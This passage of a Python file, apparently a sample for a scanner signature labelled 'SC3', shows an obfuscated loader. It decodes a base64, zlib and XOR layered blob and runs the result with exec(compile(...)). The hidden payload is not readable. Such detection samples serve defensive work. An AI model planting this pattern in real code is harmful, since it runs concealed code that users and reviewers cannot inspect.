3pt0XLWqFz3uFgAf0X2gO05tD+U38usfCOg/eHkDnRe5n47tHWrHitIpd8Bc+RmmcDq++2cfLfomUs3Uc+85OjDNP/zOrwk8tqSKsgJKREra19mPeGtMGPEtHOD5qRtoNyX14lcFKTrX59//pfYjo9asHz4m0mZ0dTt2+QvZ051O"
_K = bytes.fromhex("9649bb16529efe828ece71ee")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
